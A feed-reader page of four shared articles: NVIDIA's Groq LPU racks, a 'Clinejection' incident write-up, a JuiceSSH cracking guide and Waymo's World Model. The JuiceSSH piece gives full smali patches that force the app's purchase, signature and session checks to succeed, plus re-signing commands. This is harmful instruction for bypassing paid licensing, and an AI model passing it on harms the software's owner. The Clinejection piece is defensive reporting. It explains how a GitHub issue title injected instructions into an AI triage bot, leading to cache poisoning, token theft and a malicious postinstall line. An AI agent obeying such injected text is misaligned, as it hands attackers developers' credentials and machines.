120 stories
·
0 followers

Decoding the Future of Inference At NVIDIA: Groq LPUs Join Vera Rubin Platform For Low-Latency Inference

1 Share

Patrick In NVIDIA Groq 3 LPU At NVIDIA GTC 2026 LargePatrick In NVIDIA Groq 3 LPU At NVIDIA GTC 2026 Large

Among a plethora of announcements coming out of NVIDIA this week for their 2026 GTC AI conference, arguably the highest profile announcement was about a hardware technology that is not quite NVIDIA’s own: the Groq Language Processor Unit, or LPU. On Christmas Eve of 2025, in a deal reportedly worth $20 billion NVIDIA made a major future architectural shift. Per that deal, NVIDIA hired a significant number of the company’s senior staff, acquired its physical assets, and also acquired a non-exclusive license to Groq’s chief technology, its LPU.

It was a deal that raised significant questions about just what NVIDIA was hoping to do, why they were spending so much money on a struggling competitor, and why they seemed to be in such a hurry to acquire a company when half the world has already kicked off its holiday break. The answers to those questions, CEO Jensen Huang told investors and the public during the company’s Q4’FY2026 earnings call, would come during GTC. And with day one of the show having wrapped up, headlined by Huang’s critical visionary keynote, we finally have those answers.

NVIDIA GTC 2026 Keynote Vera Rubin NVL72NVIDIA GTC 2026 Keynote Vera Rubin NVL72

In short, NVIDIA has acquired Groq’s technology in order to boost its own inference performance for its high-end, rack-scale systems. With Groq’s inference-focused LPUs having been designed for low-latency AI inference, NVIDIA will be using Groq’s hardware as an accelerator for Vera Rubin NVL72 racks, in the form of the NVIDIA Groq 3 LPX rack, delivering higher (and quicker) token throughput rates than NVIDIA’s GPUs can provide alone. The ultimate goal for NVIDIA is that the inclusion of Groq LPUs not only boosts the overall performance of Vera Rubin racks but also offers a substantial boost in the kind of low-latency performance that agentic AIs need to quickly react to one another, and to which AI customers are willing to spend a premium.

A Classic Case of High Throughput Versus Low Latency

While NVIDIA’s acquisition of Groq’s assets was relatively sudden, the problem at hand has been one that NVIDIA has been wrangling with for some time now. The company’s GPUs, the backbone of their AI efforts, are fundamentally high-throughput processors. With their massive arrays of ALUs, GPUs specialize in efficiently processing massive amounts of data. In order to maximize the total amount of data they process, the trade-off they make is that they are not very quick about it in regard to latency. As a result, fully utilizing a GPU, be it for classical compute or AI workloads, involves using a number of tricks to hide latency and context switch between threads so that the GPU always has something to work on while its memory and cache subsystems are fetching the next block of instructions and data for another group of threads.

All this hyper-optimization for throughput means GPUs are poorly suited to low-latency operation. The qualities that make a processor good at low-latency computing, such as a large number of registers, copious caches, and execution units to provide beefy instruction-level parallelism, make for poor GPUs. The hardware needed to provide efficient, low-latency compute would eat into die space that could instead go towards more ALUs for higher GPU throughput.

NVIDIA GPU LatencyNVIDIA GPU Latency vs. Throughput

This, in a nutshell, is the classic CPU/GPU trade-off. NVIDIA’s compute empire is, by and large, built on (correctly) predicting that most workloads benefit from high throughput more than they benefit from low latency. This is why many classic computing workloads are becoming GPU-accelerated these days. In the AI space, it is even more evident that CPU-only AI inference is hardly a consideration in most cases.

This kind of throughput/latency tradeoff extends into AI inference as well. Even if you have already decided to use a GPU, it is possible to tune its performance and the software running on it to favor throughput or latency, a performance curve exists between the two, where system operators can slide between them. This has been the crux of NVIDIA’s performance argument up through the Grace Blackwell generation. NVIDIA’s GPUs can produce a large number of tokens when optimized for throughput, fewer when optimized for low latency. Customers can focus on finding the optimal (Pareto) region along that curve to reduce latency while still achieving relatively high total throughput.

NVIDIA Blackwell Token CurveNVIDIA Blackwell Token Curve

It is an argument that was not on entirely solid footing in 2025, and is on even rockier footing in 2026. The optimal operating points for a GPU do not offer latencies low enough for the kind of rapid-fire single-user token rates that NVIDIA believes are needed for agentic AI. Latency becomes a key differentiator as humans are removed from high-value workflows.

Accelerating the Accelerator: Groq Language Processor Units

While NVIDIA has been dealing with how to achieve lower latencies from high-latency GPUs, some of its competitors have been tackling the problem from the other direction, designing inference accelerators that are low-latency from the start. Chief among these has been Cerebras and Groq. Groq’s chief technology was the Tensor Streaming Processor, later rebranded as the Language Processor Unit (LPU).

NVIDIA Groq 3 LPU In Hand Pads LargeNVIDIA Groq 3 LPU In Hand Pads Large

While not by any means a CPU, Groq’s LPU employs numerous design decisions that favor low-latency execution of tensors and other AI math over high throughput. The end result of those design decisions is that Groq’s LPU technology is wildly different from NVIDIA’s GPU. For NVIDIA, this is a fantastic thing.

NVIDIA Rubin_GPU_and_Groq_3_LPUNVIDIA Rubin_GPU_and_Groq_3_LPU

While we will not go into the nitty-gritty of Groq’s LPU architecture at this time, there are a few key design elements that allow it to offer such low latencies. Key among these is SRAM: Groq’s chips feature a ridiculous amount of on-chip SRAM for their size and performance levels. The LP30 chips NVIDIA will use have 500 MB of SRAM. This is all on-die, so there is a massive 150 TB/second of memory bandwidth between these SRAM blocks and the compute elements on the LP30. As a result, it allows the compute elements to access any local data they need extremely quickly, even faster than what we think of as fast for NVIDIA’s HBM-equipped GPUs.

NVIDIA Groq 3 ArchitectureNVIDIA Groq 3 Architecture

The other interesting aspect of Groq’s architecture is that it is deterministic. Instead of scheduling in hardware, as is common in CPUs and GPUs, instruction scheduling is handled entirely by the compiler ahead of time. Thus, the code emitted by the compiler knows exactly what the LPU will be doing at any given time. This kind of static instruction scheduling is not new to Groq’s hardware. In fact, it is a common sight amongst VLIW designs, but it is one of the big factors in the hardware’s low latency because there’s no need to guess (or stall for) when a piece of data will be available or when an instruction will complete; everything is executing along a very carefully orchestrated series of events.

NVIDIA’s Groq LPUs: Decode Specialists

Ultimately, Groq’s hardware design not only makes the architecture good at low-latency inference but also makes it especially good at one specific aspect of inference: decode. The second stage of traditional inference methods, the decode stage, is where tokens are actually generated, consuming prefilled data (key values) to generate the output tokens.

Whereas prefill is largely a compute-bound, highly parallel action, decode is far more serial in nature and sensitive to memory performance. Each successive token depends on the output of the previous token. There are a few good shortcuts here for high-throughput processors like GPUs, as they cannot move on to the next token for a user until the previous token has been returned. This makes low-latency performance critical, as lower latency means the current token will be complete that much sooner.

NVIDIA LPU Decode LoopNVIDIA LPU Decode Loop

As a result, for high-end Vera Rubin rackscale systems, NVIDIA will split the inference process between Rubin GPUs and Groq LP30 LPUs. NVIDIA is taking a hyper-specialized route, running not only the prefill process on their GPUs, but also the sub-tasks of the decode process that still benefit from throughput, such as the attention phase of decoding. Meanwhile, the LPU gets to handle things such as the execution of feed-forward networks (FFNs).

By doing this, NVIDIA effectively offloads only the parts of the decode phase that Groq’s LPUs are super-fast at. In essence, NVIDIA is addressing the GPU latency-versus-throughput trade-off with a chip that does the opposite.

NVIDIA Rubin + LPU Token CurveNVIDIA Vera Rubin + LPU Token Curve

It goes without saying that none of this is free. Not in terms of hardware, not in terms of power budgets, and not in terms of overall complexity (this effectively turns a Vera Rubin rack into a heterogeneous system). It gives NVIDIA upwards of 35x the throughput (versus Grace Blackwell) at a given tokens-per-second-per-user generation rate, and it allows NVIDIA to viably extend their performance curve to far higher TPS-per-user rates than what Vera Rubin could achieve as just a GPU+CPU system. All of which, in turn, allows for more responsive AI models/agents and for the longer contexts (at acceptable performance levels) that these models need to deliver their best performance.


Page 2

While the theoretical background on NVIDIA’s use of LPUs is rooted in single processors, the real-world use of the technology is all about scale. While NVIDIA is now counting the LP30 LPU as one of its seven chips for the Rubin Vera era, NVIDIA did not license Groq’s technology in order to throw a single LPU in a DGX Station or NVL8 server. NVIDIA licensed Groq’s technology to build high-performance rack-scale solutions. So that is exactly where Groq’s LPUs are going: the big leagues.

NVIDIA LPX RackNVIDIA LPX Rack

NVIDIA will be offering the NVIDIA Groq 3 LPX as an optional addition to Vera Rubin rackscale configurations. If customers want to build a server cluster that can offer high single-user token rates and low-latency responsiveness, ideal for running agentic AIs that want to quickly chat amongst themselves, they can add some LPX racks to boost performance. NVIDIA is not prescribing a specific ratio of LPX racks to NVL72 racks, but ultimately it is going to depend on how much a customer values low-latency token throughput, and of course, how much they want to spend.

A single LPX rack, in turn, will comprise 256 LPUs, organized into 32 1U trays. This will give the aggregate LPX rack 128GB of SRAM capacity and some 315 PFLOPS of FP8 compute, which is still a rather tiny amount of memory and compute throughput relative to an NVL72 GPU rack, but it is enough to serve as the accelerator that NVIDIA needs. Instead of holding a giant model fully in-memory, the LPX rack can handle being an ultra-fast draft model provider for the Rubin GPUs running larger memory models. Indeed, it is this rackscale implementation of LPUs that even makes this strategy viable to begin with, as otherwise a handful of LPUs would not have nearly enough SRAM between them to store the kind of large models (and large context windows) that are in vogue these days.

NVIDIA Groq 3 LPX RackNVIDIA Groq 3 LPX Rack

Each compute tray, in turn, is not all that different from an NVL72 compute tray. LPX compute trays house 8 LP30 LPUs, each with chip-to-chip connections to other LPUs within the tray, as well as the C2C spine connectors that link up the trays, allowing for all 256 LPUs to function as a single scale-up domain. Notably, each tray will feature an NVIDIA NIC (either ConnectX-9 or BlueField 4) and a separate host processor. Curiously, NVIDIA has not disclosed what the host CPU is at this time, though they have disclosed that it will have (up to) 128GB of DRAM attached to it. Patrick looked at this photo during the GTC keynote and immediately saw that the host CPU has a retention mechanism only employed by 4th Gen, 5th Gen, and Intel Xeon 6 CPUs.

NVIDIA Groq 3 LPX Compute TrayNVIDIA Groq 3 LPX Compute Tray

NVIDIA notes that “LPX compute tray specifications are configuration are preliminary and subject to change,” so we will see what that CPU ends up being since we can only identify the socket retention mechanism. While NVIDIA has been coy about when it started work on integrating Groq’s hardware, Groq used x86 host CPUs in its previous designs, so it would be easiest to keep that as an x86 processor in this generation.

With that said, NVIDIA has confirmed that the LP30 LPUs are being produced by Samsung, with previous announcements from Groq stating that they would be building their future products on Samsung’s SF4X (4nm) node family. This is notable since it means that NVIDIA does not have to spend its precious TSMC wafer allocations on producing LPUs.

A Quick Look at the Future

While NVIDIA is using off-the-shelf LPUs for their first generation of LPX racks, LPUs as a whole are not going to be a one-and-done chip at NVIDIA. LPUs have been added to NVIDIA’s long-term roadmap, with the company revealing this week that they are going to be developing/ utilizing two additional generations of LPUs in the next two years.

NVIDIA GTC 2026 Keynote NVIDIA RoadmapNVIDIA GTC 2026 Keynote NVIDIA Roadmap

In 2027, there will be a relatively quick follow-up LPU, the LP35. The quick speed belies the importance of this chip, because its marquee improvement is the addition of support for NVIDIA’s NVFP4 data format. That is NVIDIA’s low-precision format of choice for inference. With LP30 only supporting data types down to FP8, the initial generation of Groq hardware at NVIDIA will leave performance on the table by working with larger data formats than NVIDIA’s GPUs would otherwise support. NVFP4 stands to further reduce the pressure on the relatively small SRAM blocks on these LPUs. In essence, this is bringing many of the same benefits to LPUs that NVFP4 brought to NVIDIA’s GPUs with Blackwell.

That will be followed by LP40 in 2028. The marquee feature here is NVLink support, which would allow LPUs to plug into NVIDIA’s homegrown backhaul technology, rather than using Groq’s current technology. Whether that means using NVLink just to replace Groq’s LPU-to-LPU connections, or going further and using NVLink to directly connect LPUs and GPUs remains to be seen. At the surface, it will be the first generation of the LPU architecture, explicitly designed to better integrate with NVIDIA’s hardware ecosystem.

Adieu to Rubin CPX?

Amidst all of NVIDIA’s focus on LPUs across Vera Rubin racks and architectural roadmaps, there is one subject that NVIDIA has been noticeably silent on: Rubin CPX, NVIDIA’s previously planned solution to the inference decode divide.

NVIDIA Vera Rubin NVL144 CPX2025: NVIDIA Vera Rubin NVL144 CPX

As revealed by NVIDIA only back in September of 2025, Rubin CPX would be a GDDR7-backed Rubin GPU that would go into Rubin Vera NVL72 racks to handle the decode phase of token generation – the same role that Gorq’s LPUs are being employed for now.

NVIDIA Context And Generation September 2025NVIDIA Context And Generation September 2025

When asked about the future of Rubin CPX in a press Q&A session, NVIDIA’s answer more or less discounted Rubin CPX entirely. According to company representatives, NVIDIA is focusing on integrating LPUs (and the LPX rack) into the Vera Rubin platform to optimize decode, and that is it.

NVIDIA Groq 3 LPU In Hand LargeNVIDIA Groq 3 LPU In Hand Large

To be sure, NVIDIA has never officially declared Rubin CPX dead. Still, for as quickly as it was introduced, it has quickly become an apparent afterthought for NVIDIA, as they have decided to hitch the future of decode acceleration onto their recently acquired Groq LPU technology instead. Regardless, the end result is that Rubin CPX is noticeably absent from this year’s GTC.

Final Words

This is one of the more exciting announcements. NVIDIA has a new accelerator and has shown its willingness to get into a heterogeneous mix of silicon, even for running AI models. On the competitive front, for companies building custom silicon based on data-flow engines, NVIDIA now has a solution in that space. This is not a low-cost solution for running the largest models. Instead, it is being used as a point solution to accelerate a high-value workload and keep the GPUs doing what they do best. This is a big shift for NVIDIA, and it will be exciting to see how it evolves in future generations.

Read the whole story
bernhardbock
10 hours ago
reply
Share this story
Delete

A GitHub Issue Title Compromised 4,000 Developer Machines

1 Share
The Clinejection attack chain: a prompt injection in a GitHub issue title cascades through AI triage, cache poisoning, and credential theft to silently install OpenClaw on 4,000 developer machinesFive steps from a GitHub issue title to 4,000 compromised developer machines. The entry point was natural language.

On February 17, 2026, someone published <a href="mailto:cline@2.3.0">cline@2.3.0</a> to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:

"postinstall": "npm install -g openclaw@latest"

For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine without consent. Approximately 4,000 downloads occurred before the package was pulled1.

The interesting part is not the payload. It is how the attacker got the npm token in the first place: by injecting a prompt into a GitHub issue title, which an AI triage bot read, interpreted as an instruction, and executed.

The full chain

The attack - which Snyk named "Clinejection"2 - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.

Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation.

On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository3.

Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository (glthub-actions/cline, note the missing 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script.

Step 3: Cache poisoning. The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub's LRU eviction policy and evicting legitimate cache entries. The poisoned entries were crafted to match the cache key pattern used by Cline's nightly release workflow.

Step 4: Credential theft. When the nightly release workflow ran and restored node_modules from cache, it got the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated3.

Step 5: Malicious publish. Using the stolen npm token, the attacker published <a href="mailto:cline@2.3.0">cline@2.3.0</a> with the OpenClaw postinstall hook. The compromised version was live for eight hours before StepSecurity's automated monitoring flagged it - approximately 14 minutes after publication1.

A botched rotation made it worse

Security researcher Adnan Khan had actually discovered the vulnerability chain in late December 2025 and reported it via a GitHub Security Advisory on January 1, 2026. He sent multiple follow-ups over five weeks. None received a response3.

When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They began credential rotation the next day.

But the rotation was incomplete. The team deleted the wrong token, leaving the exposed one active4. They discovered the error on February 11 and re-rotated. But the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish the compromised package six days later.

Khan was not the attacker. A separate, unknown actor found Khan's proof-of-concept on his test repository and weaponised it against Cline directly3.

The new pattern: AI installs AI

The specific vulnerability chain is interesting but not unprecedented. Prompt injection, cache poisoning, and credential theft are all documented attack classes. What makes Clinejection distinct is the outcome: one AI tool silently bootstrapping a second AI agent on developer machines.

This creates a recursion problem in the supply chain. The developer trusts Tool A (Cline). Tool A is compromised to install Tool B (OpenClaw). Tool B has its own capabilities - shell execution, credential access, persistent daemon installation - that are independent of Tool A and invisible to the developer's original trust decision.

OpenClaw as installed could read credentials from ~/.openclaw/, execute shell commands via its Gateway API, and install itself as a persistent system daemon surviving reboots1. The severity was debated - Endor Labs characterised the payload as closer to a proof-of-concept than a weaponised attack5 - but the mechanism is what matters. The next payload will not be a proof-of-concept.

This is the supply chain equivalent of confused deputy: the developer authorises Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated, never configured, and never consented to.

Why existing controls did not catch it

npm audit: The postinstall script installs a legitimate, non-malicious package (OpenClaw). There is no malware to detect.

Code review: The CLI binary was byte-identical to the previous version. Only package.json changed, and only by one line. Automated diff checks that focus on binary changes would miss it.

Provenance attestations: Cline was not using OIDC-based npm provenance at the time. The compromised token could publish without provenance metadata, which StepSecurity flagged as anomalous1.

Permission prompts: The installation happens in a postinstall hook during npm install. No AI coding tool prompts the user before a dependency's lifecycle script runs. The operation is invisible.

The attack exploited the gap between what developers think they are installing (a specific version of Cline) and what actually executes (arbitrary lifecycle scripts from the package and everything it transitively installs).

What Cline changed afterward

Cline's post-mortem4 outlines several remediation steps:

  • Eliminated GitHub Actions cache usage from credential-handling workflows
  • Adopted OIDC provenance attestations for npm publishing, eliminating long-lived tokens
  • Added verification requirements for credential rotation
  • Began working on a formal vulnerability disclosure process with SLAs
  • Commissioned third-party security audits of CI/CD infrastructure

These are meaningful improvements. The OIDC migration alone would have prevented the attack - a stolen token cannot publish packages when provenance requires a cryptographic attestation from a specific GitHub Actions workflow.

The architectural question

Clinejection is a supply chain attack, but it is also an agent security problem. The entry point was natural language in a GitHub issue title. The first link in the chain was an AI bot that interpreted untrusted text as an instruction and executed it with the privileges of the CI environment.

This is the same structural pattern we have written about in the context of MCP tool poisoning and agent skill registries - untrusted input reaches an agent, the agent acts on it, and nothing evaluates the resulting operations before they execute.

The difference here is that the agent was not a developer's local coding assistant. It was an automated CI workflow that ran on every new issue, with shell access and cached credentials. The blast radius was not one developer's machine - it was the entire project's publication pipeline.

Every team deploying AI agents in CI/CD - for issue triage, code review, automated testing, or any other workflow - has this same exposure. The agent processes untrusted input (issues, PRs, comments) and has access to secrets (tokens, keys, credentials). The question is whether anything evaluates what the agent does with that access.

Per-syscall interception catches this class of attack at the operation layer. When the AI triage bot attempts to run npm install from an unexpected repository, the operation is evaluated against policy before it executes - regardless of what the issue title said. When a lifecycle script attempts to exfiltrate credentials to an external host, the egress is blocked.

The entry point changes. The operations do not. grith was built to catch exactly this class of problem - evaluating every operation at the syscall layer, regardless of which agent triggered it or why.

Read the whole story
bernhardbock
8 days ago
reply
Share this story
Delete

JuiceSSH - Give me my pro features back

1 Share

JuiceSSH used to be, in my humble personal opinion, and for the uses I had, the best SSH client available on Android until December 2025.

Since then, the purchase made in 2019 is not recognized anymore, and the price went up by 20$. Some users complained in review, before it got unlisted from google play, that after buying it again, the application doesn't get activated. Support is unresponsive, this looks like an exit scam.

Below is a way to make the application work again. This required jadx to understand smali, and will require you ApkTool and jarsigner, which is part of OpenJDK, and you that can install on Windows using choco install openjdk.

You'll also need a JuiceSSH apk, I downloaded one from PureAPK, but feel free to dump your own from your device using adb if you cannot find it. Make sure to verify the hash using virus total/sha256sum if downloading from internet, which should be d1ee811bcd82f25aea0bdc568896d82017ee174d9c4631c123a9d9173c748232 for the last version available, version 3.2.2.

Below are powershell version of the command lines, but you get the idea.

Decompile

The first step is to decompile the dex packed code from the apk.

& "C:\Program Files\OpenJDK\jdk-25\bin\java.exe" -jar ./apktool_2.12.1.jar d juicessh.apk

Modify smali

You then need to modify the smali of three files, which are detailed below.

smali/com/sonelli/juicessh/models/User.smali

In this file, we'll patch the purchase validation and signature validation, done by the public boolean H() function.

Here is the original version.

public boolean H() {
    try {
        String str = "";
        ArrayList arrayList = new ArrayList();
        for (Purchase purchase : this.purchases) {
            if (!arrayList.contains(purchase.order)) {
                str = str + purchase.product + purchase.state;
                arrayList.add(purchase.order);
            }
        }
        return vg0.b(this.signature, this.sessionIdentifier + this.name + this.email + str + this.disabled.toString());
    } catch (IllegalStateException e) {
        e.printStackTrace();
        return false;
    }
}

Which we'll simply change into

public boolean H() {
    return true;
}
# virtual methods
.method public H()Z
    .locals 1

    const/4 v0, 0x1
    return v0
.end method

smali/com/sonelli/oi0.smali

In this one, we'll patch the public static boolean d(Object obj) function, who calls the H() function we modified above, which now returns true, filters product matching JuiceSSH in purchases list, and check if it the purchase is valid. We'll simply make it return true in any case.

Here is the original version:

public static boolean d(Object obj) {
    if (!obj.getClass().getName().equals(User.class.getName())) {
        return false;
    }
    try {
        if (!((User) obj).H()) {
            return false;
        }
        ArrayList arrayList = new ArrayList();
        for (Purchase purchase : ((User) obj).purchases) {
            if (purchase.product.equals(a())) {
                arrayList.add(purchase);
            }
        }
        Collections.sort(arrayList, new a());
        if (arrayList.size() > 0) {
            if (((Purchase) arrayList.get(arrayList.size() - 1)).state.intValue() == 0) {
                return true;
            }
        }
        return false;
    } catch (NullPointerException e) {
        e.printStackTrace();
        return false;
    }
}

Here is the patched one:

public static boolean d(Object obj) {
    return obj.getClass().getName().equals(User.class.getName());
}
.method public static d(Ljava/lang/Object;)Z
    .locals 3

    # obj.getClass()
    invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
    move-result-object v0

    # obj.getClass().getName()
    invoke-virtual {v0}, Ljava/lang/Class;->getName()Ljava/lang/String;
    move-result-object v0

    # User.class
    const-class v1, Lcom/sonelli/juicessh/models/User;

    # User.class.getName()
    invoke-virtual {v1}, Ljava/lang/Class;->getName()Ljava/lang/String;
    move-result-object v1

    # compare strings
    invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
    move-result v2

    if-nez v2, :cond_true

    const/4 v0, 0x0
    return v0

    :cond_true
    const/4 v0, 0x1
    return v0
.end method

smali/com/sonelli/pi0.smali

Finally, we'll patch the central part of the authentication, which is called each time a pro-feature is triggered to ensure user has valid license, the public static void j(Context context, p pVar) function.

Here is the original version:

public static void j(Context context, p pVar) {
    User user;
    User user2;
    String strS = User.s(context);
    if (strS == null) {
        pVar.a(context.getString(R$string.authentication_failure));
        return;
    }
    if (strS.equals("New User")) {
        pVar.a("New User");
        return;
    }
    User user3 = b;
    if (user3 != null && !user3.disabled.booleanValue()) {
        long jCurrentTimeMillis = System.currentTimeMillis() - b.modified;
        DateUtils.getRelativeTimeSpanString(System.currentTimeMillis() + (b.w() * 1000), System.currentTimeMillis(), 0L, 0);
        DateUtils.getRelativeTimeSpanString(System.currentTimeMillis() + (3600000 - jCurrentTimeMillis), System.currentTimeMillis(), 0L, 0);
        if (b.w() <= 0) {
            gj0.b("API", "Cached user's API session has expired - refreshing session...");
            e(context, null, b.sessionIdentifier, pVar);
            return;
        }
        pVar.b(b);
        if (jCurrentTimeMillis <= 3600000 || context == null || (user2 = b) == null) {
            return;
        }
        e(context, null, user2.sessionIdentifier, null);
        return;
    }
    User userA = User.A(context);
    if (userA == null || userA.disabled.booleanValue() || !userA.H()) {
        e(context, null, null, pVar);
        return;
    }
    b = userA;
    if (userA.w() <= 0) {
        e(context, null, b.sessionIdentifier, pVar);
        return;
    }
    pVar.b(b);
    if (context == null || (user = b) == null) {
        return;
    }
    e(context, null, user.sessionIdentifier, null);
}

pVar.b() is the success callback we'll call while e() is called in case of error. b is the globally stored user we'll have to set. To patch this, we'll simply craft a User with meaningless data, a session expire always in future, save the user in b, and call the success callback every time.

public static void j(Context context, p pVar) {
    User user = new User();
    user.email = "myemail@google.com";
    user.name = "hello";
    user.given_name = "hello";
    user.sessionExpires = System.currentTimeMillis() + (86400000 * 365);
    user.sessionIdentifier = "";
    b = user;
    pVar.b(user);
}
.method public static j(Landroid/content/Context;Lcom/sonelli/pi0$p;)V
    .locals 8

    # User u = new User();
    new-instance v0, Lcom/sonelli/juicessh/models/User;
    invoke-direct {v0}, Lcom/sonelli/juicessh/models/User;-><init>()V

    # u.email = "myemail@google.com";
    const-string v1, "myemail@google.com"
    iput-object v1, v0, Lcom/sonelli/juicessh/models/User;->email:Ljava/lang/String;

    # u.name = "hello";
    const-string v1, "hello"
    iput-object v1, v0, Lcom/sonelli/juicessh/models/User;->name:Ljava/lang/String;

    # u.given_name = "hello";
    iput-object v1, v0, Lcom/sonelli/juicessh/models/User;->given_name:Ljava/lang/String;

    # long now = System.currentTimeMillis();
    invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    move-result-wide v2

    # yearMillis = 86400000L * 365L
    const-wide/32 v4, 0x05265c00      # 86400000
    const-wide/16 v6, 0x016d          # 365
    mul-long/2addr v4, v6

    # u.sessionExpires = now + yearMillis;
    add-long/2addr v2, v4
    iput-wide v2, v0, Lcom/sonelli/juicessh/models/User;->sessionExpires:J

    # u.sessionIdentifier = ""
    const-string v1, ""
    iput-object v1, v0, Lcom/sonelli/juicessh/models/User;->sessionIdentifier:Ljava/lang/String;

    # pi0.b = u;
    sput-object v0, Lcom/sonelli/pi0;->b:Lcom/sonelli/juicessh/models/User;

    # pVar.b(b);
    invoke-virtual {p1, v0}, Lcom/sonelli/pi0$p;->b(Lcom/sonelli/juicessh/models/User;)V

    return-void
.end method

Recompile

& "C:\Program Files\OpenJDK\jdk-25\bin\java.exe" -jar .\apktool_2.12.1.jar b juicessh

The built apk can then be found in juicessh\dist\juicessh.apk.

Sign the apk

# Create a keystore if needed to self sign the APK
keytool -genkey -v -keystore k.keystore -alias a -keyalg RSA -keysize 2048 -validity 50000

# Sign the APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore k.keystore ./juicessh/dist/juicessh.apk a

Done

You can install this apk, ignore the security warning because it is self signed, and enjoy JuiceSSH with its pro features again.

I don't think the cloud sync will ever work again, but that's a minor inconvenience, and you cannot trust a developper who act like this anyway. The plugins don't work anymore too, which is really a joke.

Read the whole story
bernhardbock
36 days ago
reply
Share this story
Delete

The Waymo World Model: A New Frontier For Autonomous Driving Simulation

1 Share

The Waymo Driver has traveled nearly 200 million fully autonomous miles, becoming a vital part of the urban fabric in major U.S. cities and improving road safety. What riders and local communities don’t see is our Driver navigating billions of miles in virtual worlds, mastering complex scenarios long before it encounters them on public roads. Today, we are excited to introduce the Waymo World Model, a frontier generative model that sets a new bar for large-scale, hyper-realistic autonomous driving simulation. 

Simulation of the Waymo Driver evading a vehicle going in the wrong direction. The simulation initially follows a real event, and seamlessly transitions to using camera and lidar images automatically generated by an efficient real-time Waymo World Model.

Simulation is a critical component of Waymo’s AI ecosystem and one of the three key pillars of our approach to demonstrably safe AI. The Waymo World Model, which we detail below, is the component that is responsible for generating hyper-realistic simulated environments.

The Waymo World Model is built upon Genie 3—Google DeepMind's most advanced general-purpose world model that generates photorealistic and interactive 3D environments—and is adapted for the rigors of the driving domain. By leveraging Genie’s immense world knowledge, it can simulate exceedingly rare events—from a tornado to a casual encounter with an elephant—that are almost impossible to capture at scale in reality. The model’s architecture offers high controllability, allowing our engineers to modify simulations with simple language prompts, driving inputs, and scene layouts. Notably, the Waymo World Model generates high-fidelity, multi-sensor outputs that include both camera and lidar data.

This combination of broad world knowledge, fine-grained controllability, and multi-modal realism enhances Waymo’s ability to safely scale our service across more places and new driving environments. In the following sections we showcase the Waymo World Model in action, featuring simulations of the Waymo Driver navigating diverse rare edge-case scenarios.

🌎 Emergent Multimodal World Knowledge

Most simulation models in the autonomous driving industry are trained from scratch based on only the on-road data they collect. That approach means the system only learns from limited experience. Genie 3’s strong world knowledge, gained from its pre-training on an extremely large and diverse set of videos, allows us to explore situations that were never directly observed by our fleet.

Through our specialized post-training, we are transferring that vast world knowledge from 2D video into 3D lidar outputs unique to Waymo’s hardware suite. While cameras excel at depicting visual details, lidar sensors provide valuable complementary signals like precise depth. The Waymo World Model can generate virtually any scene—from regular, day-to-day driving to rare, long-tail scenarios—across multiple sensor modalities.

🌪️ Extreme weather conditions and natural disasters
💥 Rare and safety-critical events
🐘 Long-tail (pun intended!) objects and more

In the interactive viewers below, you can immersively view the realistic 4D point clouds generated by the Waymo World Model.

🕹️ Strong Simulation Controllability

The Waymo World Model offers strong simulation controllability through three main mechanisms: driving action control, scene layout control, and language control.

Driving action control allows us to have a responsive simulator that adheres to specific driving inputs. This enables us to simulate “what if” counterfactual events such as whether the Waymo Driver could have safely driven more confidently instead of yielding in a particular situation.

Counterfactual driving. We demonstrate simulations both under the original route in a past recorded drive, or a completely new route. While purely reconstructive simulation methods (e.g., 3D Gaussian Splats, or 3DGS) suffer from visual breakdowns due to missing observations when the simulated route is too different from the original driving, the fully learned Waymo World Model maintains good realism and consistency thanks to its strong generative capabilities.

Scene layout control allows for customization of the road layouts, traffic signal states, and the behavior of other road users. This way, we can create custom scenarios via selective placement of other road users, or applying custom mutations to road layouts.

Scene layout conditioning following

Language control is our most flexible tool that allows us to adjust time-of-day, weather conditions, or even generate an entirely synthetic scene (such as the long-tail scenarios shown previously).

World Mutation - Time of Day

World Mutation - Weather

🎞️ Converting Dashcam Videos

During a scenic drive, it is common to record videos of the journey on mobile devices or dashcams, perhaps capturing piled up snow banks or a highway at sunset. The Waymo World Model can convert those kinds of videos, or any taken with a regular camera, into a multimodal simulation—showing how the Waymo Driver would see that exact scene. This process enables the highest degree of realism and factuality, since simulations are derived from actual footage.

⚙️ Scalable Inference

Some scenes we want to simulate may take longer to play out, for example, negotiating passage in a narrow lane. That’s harder to do because the longer the simulation, the tougher it is to compute and maintain stable quality. However, through a more efficient variant of the Waymo World Model, we can simulate longer scenes with dramatic reduction in compute while maintaining high realism and fidelity to enable large-scale simulations.

🚀  Long rollout (4x speed playback) on an efficient variant of the Waymo World Model

By simulating the “impossible”, we proactively prepare the Waymo Driver for some of the most rare and complex scenarios. This creates a more rigorous safety benchmark, ensuring the Waymo Driver can navigate long-tail challenges long before it encounters them in the real world.

Acknowledgements


The Waymo World Model is enabled by the key research, engineering and evaluation contributions from James Gunn, Kanaad Parvate, Lu Liu, Lucas Deecke, Luca Bergamini, Zehao Zhu, Raajay Viswanathan, Jiahao Wang, Sakshum Kulshrestha, Titas Anciukevičius, Luna Yue Huang, Yury Bychenkov, Yijing Bai, Yichen Shen, Stefanos Nikolaidis, Tiancheng Ge, Shih-Yang Su and Vincent Casser.

